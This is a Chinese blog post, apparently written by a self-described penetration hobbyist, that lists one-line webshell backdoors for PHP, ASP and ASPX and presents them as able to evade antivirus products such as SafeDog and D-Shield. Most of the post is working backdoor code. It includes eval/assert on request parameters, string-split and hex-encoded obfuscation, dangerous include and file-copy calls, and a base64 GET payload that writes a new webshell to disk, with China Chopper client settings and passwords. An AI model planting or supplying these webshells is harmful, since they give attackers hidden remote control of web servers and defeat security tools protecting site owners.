ASP/PHP一句话木马过安全狗等杀软

站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。

整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。

看多了之后 自然可以干掉木马……

PHP一句话木马

1
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
3
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST1);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话
<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

<?php 
$item[‘wind’] = 'assert'; 
$array[] = $item; 
$array[0][‘wind’]($_POST[‘pass’]);  
?>

密码:123

<script language="php">@eval_r($_POST[mima])</script>
//绕过<?限制的一句话  部分软件会拦截  <? 

<?php @preg_replace(“/[email]/e”,$_POST[‘h’],”error”); ?>

菜刀附加数据:

<O>h=@eval($_POST[c]);</O>

[email]和error你看着换吧,怎么隐蔽怎么来

密码 c

超级隐蔽的PHP后门:

<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

 

 

ASP一句话木马

<%

password=Request(“Class”)

Execute(AACode(“457865637574652870617373776F726429″)):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(“AACode=AACode&chr(&H”&c&”)”):Else:Execute(“AACode=AACode&chr(&H”&c&Mid(s,i+2,2)&”)”):i=i+2:End If:Next:End Function

%>

密码 Class

<script language="C#" runat="server">           
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");            
</script>                                                       // 这个是ASPX的一句话  密码是webadmin

 

<%                    // 过安全狗的ASP一句话木马
dim play
'
'
''''''''''''''''''
'''''''''
play = request("www.exehack.net")
%>
Error
<%
execute(play)
%>

待更新 … … 

转载请保留出处:无极领域 » ASP/PHP一句话木马过安全狗等杀软

赞 (36)